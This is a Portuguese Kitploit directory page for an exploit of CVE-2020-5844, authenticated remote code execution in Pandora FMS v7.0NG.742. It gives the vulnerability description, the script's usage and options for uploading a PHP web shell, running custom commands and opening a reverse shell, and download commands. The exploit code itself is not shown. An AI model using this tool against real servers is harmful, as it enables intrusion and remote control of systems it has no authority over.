Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
exploit-CVE-2020-5844 — Exploit para CVE-2020-5844 (Pandora FMS v7.0NG.742) - Execução Remota de Código | Kitploit
Ferramentas/GitHubGitHub/unicordev/exploit-cve-2020-5844
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubunicordev/exploit-cve-2020-5844

exploit-CVE-2020-5844

Exploit para CVE-2020-5844 (Pandora FMS v7.0NG.742) - Execução Remota de Código

Ver Repositório
718há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Site
Compartilhar

Exploit para CVE-2020-5844 (Pandora FMS v7.0NG.742) - Execução Remota de Código

Capa do CVE no GitHub

Gostou deste repositório? Dê-nos uma ⭐!

Apenas para fins educacionais e de pesquisa de segurança autorizada.

Autor do Exploit

@UNICORDev por (@NicPWNs e @Dev-Yeoj)

Descrição da Vulnerabilidade

index.php?sec=godmode/extensions&sec2=extensions/files_repo no Pandora FMS v7.0 NG permite que administradores autenticados carreguem scripts PHP maliciosos e os executem por meio de decodificação base64 da localização do arquivo. Isso afeta v7.0NG.742_FIX_PERL2020.

Descrição do Exploit

Use este exploit para execução remota de código em versões vulneráveis do Pandora FMS. Requer endereço IP e porta do alvo. Requer nome de usuário/senha válidos ou autenticação válida via cookie PHPSESSID. Execute no modo padrão para carregar um web shell PHP básico. Execute no modo de comando personalizado para executar um comando personalizado no alvo. Execute no modo de shell reverso para receber um shell reverso do alvo em um listener que você configurou. Execute no modo personalizado de web shell para alterar o nome do arquivo do web shell PHP.

Uso

root@kitploit:~
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]
  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]
  python3 exploit-CVE-2020-5844.py -h

Opções

root@kitploit:~
  -t    Target host and port. Provide target IP address and port.
  -u    Target username and password. Provide username and password to log in to Pandora FMS.
  -p    Target valid PHP session ID. No username or password needed. (Optional)
  -s    Reverse shell mode. Provide local IP address and port. (Optional)
  -c    Custom command mode. Provide command to execute. (Optional)
  -w    Web shell custom mode. Provide custom PHP file name. (Optional)
  -h    Show this help menu.

Download

Baixar exploit-CVE-2020-5844.py do GitHub

Baixar exploit-CVE-2020-5844.py do ExploitDB

Searchsploit (ExploitDB)

root@kitploit:~
searchsploit -u
searchsploit -m 50961

Aplica-se A

Pandora FMS v7.0NG.742

Requisitos do Exploit

  • python3
  • python3:requests

Demonstrações

Modo Padrão com Nome de Usuário e Senha

default

Modo Padrão com PHPSESSID

default_sess

Modo de Comando Personalizado

command

Modo de Shell Reverso

shell

Modo Personalizado de Nome do Web Shell

web

Créditos

  • https://nvd.nist.gov/vuln/detail/CVE-2020-5844
  • https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/742_FIX_PERL2020/Tarball/pandorafms_server-7.0NG.742_FIX_PERL2020.tar.gz
  • https://app.hackthebox.com/machines/Pandora
  • https://github.com/TheCyberGeek/CVE-2020-5844
  • https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated
  • https://www.exploit-db.com/exploits/50961
Baixar ferramenta